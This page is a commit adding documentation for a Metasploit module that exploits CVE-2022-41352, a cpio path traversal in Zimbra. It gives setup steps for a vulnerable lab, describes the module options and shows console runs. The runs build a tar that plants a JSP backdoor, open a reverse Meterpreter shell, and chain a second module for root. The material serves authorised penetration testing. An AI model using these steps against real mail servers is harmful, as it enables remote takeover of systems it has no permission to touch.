Land #17114, Add exploit for CVE-2022-41352 (zimbra cpio)
This commit is contained in:
Christophe De La Fuente
@@ -0,0 +1,190 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits a symlink-based path traversal vulnerability in `cpio`
|
||||
(that's identified as CVE-2015-1197) that's exploitable in Zimbra. The
|
||||
following versions of Zimbra are vulnerable:
|
||||
|
||||
* Zimbra Collaboration Suite 9.0.0 Patch 26 (and earlier)
|
||||
* Zimbra Collaboration Suite 8.8.15 Patch 33 (and earlier)
|
||||
|
||||
The patch for Zimbra adds `pax` as a pre-requisite, so any version of Zimbra
|
||||
(except Ubuntu 18.04, which has a patched `cpio` binary) can be made vulnerable
|
||||
with `rm $(which pax)`.
|
||||
|
||||
To verify a host is vulnerable, ensure that `pax` is not installed on the host.
|
||||
Also, validate that `cpio` is listed in `amavisd.conf` as an option to extract
|
||||
.tar/.cpio files:
|
||||
|
||||
```
|
||||
[ron@mail tmp]$ sudo cat /opt/zimbra/conf/amavisd.conf | grep cpio
|
||||
[...]
|
||||
|
||||
[['cpio','tar'], \&do_pax_cpio, ['pax', 'gcpio', 'cpio'] ],
|
||||
```
|
||||
|
||||
Note that this can be chained with other Zimbra exploits to get root.
|
||||
|
||||
### Installing Zimbra
|
||||
|
||||
Create a VM
|
||||
|
||||
```
|
||||
HDD = 128gb
|
||||
Memory/etc don't matter
|
||||
```
|
||||
|
||||
I installed a local DNS server (note: replace `<ip>` with the host's actual ip)
|
||||
(other note: replace `apt` with `yum` to do this on a Red Hat-derived system):
|
||||
|
||||
```
|
||||
sudo apt update && sudo apt install dnsmasq
|
||||
sudo hostnamectl set-hostname mail.example.org
|
||||
echo "<ip> mail.example.org" | sudo tee -a /etc/hosts
|
||||
echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' | sudo tee /etc/dnsmasq.conf
|
||||
```
|
||||
|
||||
Configure the host to use it:
|
||||
|
||||
```
|
||||
sudo systemctl disable systemd-resolved
|
||||
sudo systemctl stop systemd-resolved
|
||||
sudo killall dnsmasq
|
||||
sudo systemctl restart dnsmasq
|
||||
echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
|
||||
```
|
||||
|
||||
Download Zimbra from
|
||||
https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll
|
||||
have to sell your soul and opt-in to spam, but they don't validate your email.
|
||||
|
||||
```
|
||||
tar -xvvzf zcs-*.tgz
|
||||
cd zcs*
|
||||
sudo ./install.sh
|
||||
|
||||
* Lots of <enter>
|
||||
* DO NOT install `dnscache` module (respond `N` when it ask), I had conflict issues with the local `dnsmasq`
|
||||
* Yes change the system
|
||||
* Setup the admin password, probably turn off auto-updates
|
||||
```
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: `use exploit/linux/http/zimbra_cpio_cve_2022_41352`
|
||||
1. Do: `set RHOSTS <target>`
|
||||
1. Do: `set LHOST <listenerip>`
|
||||
1. Do: `exploit`
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
### `FILENAME`
|
||||
|
||||
The filename to generate - defaults to `payload.tar`, but can be changed on the
|
||||
filesystem or whatever.
|
||||
|
||||
### `TARGET_PATH`
|
||||
|
||||
The absolute path where the payload will extract to. The default is the
|
||||
webroot, which is usually what you want
|
||||
|
||||
### `TARGET_FILENAME`
|
||||
|
||||
The actual filename. It really should end with `.jsp`, otherwise it won't
|
||||
execute.
|
||||
|
||||
By default, it's a random string with `.jsp` on the end, in the `public/`
|
||||
folder. That should work fine, especially because we can't overwrite files and
|
||||
don't want to use the same payload name more than once.
|
||||
|
||||
### `SYMLINK_FILENAME`
|
||||
|
||||
The path used for the symlink inside the archive; you probably won't ever want
|
||||
to change this (default: random)
|
||||
|
||||
### `TRIGGER_PAYLOAD`
|
||||
|
||||
A boolean, default `true`, that determines whether we use HTTP requests to
|
||||
trigger the .jsp payload. Set to `false` to trigger the payload manually.
|
||||
|
||||
### `ListenerTimeout`
|
||||
|
||||
The number of seconds to wait for a new session (default = `0`, or infinite).
|
||||
|
||||
### `CheckInterval`
|
||||
|
||||
The frequency with which to check for the payload on the server. Every
|
||||
`CheckInterval`, it performs an HTTP request to the payload path.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
To exploit Zimbra, first load the module and generate the .tar file:
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/zimbra_cpio_cve_2022_41352
|
||||
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > set LHOST 172.16.166.147
|
||||
LHOST => 172.16.166.147
|
||||
msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > set RHOSTS 172.16.166.158
|
||||
RHOSTS => 172.16.166.158
|
||||
msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > exploit
|
||||
[*] Exploit running as background job 0.
|
||||
[*] Started reverse TCP handler on 172.16.166.147:4444
|
||||
[*] Encoding the payload as a .jsp file
|
||||
[*] Adding symlink to path to .tar file: /opt/zimbra/jetty_base/webapps/zimbra/
|
||||
[*] Adding target file to the archive: public/bdhg.jsp
|
||||
[+] payload.tar stored at /home/ron/.msf4/local/payload.tar
|
||||
[+] File created! Email the file above to any user on the target Zimbra server
|
||||
|
||||
[...] waiting [...]
|
||||
```
|
||||
|
||||
Then, email that file to any user (including a non-existent mailbox) on the
|
||||
Zimbra server. Once the payload arrives at Zimbra, Zimbra should try to extract
|
||||
it to check for malware with no user interaction. Metasploit should see the
|
||||
malicious file extracted and get a session:
|
||||
|
||||
```
|
||||
[...]
|
||||
[+] File created! Email the file above to any user on the target Zimbra server
|
||||
[*] Trying to trigger the backdoor @ public/bdhg.jsp every 5s [backgrounding]...
|
||||
|
||||
[file emailed]
|
||||
|
||||
[*] Sending stage (3045348 bytes) to 172.16.166.158
|
||||
[*] Meterpreter session 1 opened (172.16.166.147:4444 -> 172.16.166.158:44808) at 2022-10-06 10:27:34 -0700
|
||||
|
||||
msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: zimbra
|
||||
```
|
||||
|
||||
For bonus points, use a different module to get root:
|
||||
|
||||
```
|
||||
msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > use exploit/linux/local/zimbra_slapper_priv_esc
|
||||
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
|
||||
|
||||
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 1
|
||||
SESSION => 1
|
||||
|
||||
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.166.147:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Executing: sudo -n -l
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Creating exploit directory: /tmp/.vT1bDSvZV
|
||||
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.vT1bDSvZV/.RhmWwHRn
|
||||
[*] Sending stage (3045348 bytes) to 172.16.166.158
|
||||
[+] Deleted /tmp/.vT1bDSvZV
|
||||
[*] Meterpreter session 2 opened (172.16.166.147:4444 -> 172.16.166.158:60166) at 2022-10-06 10:45:30 -0700
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user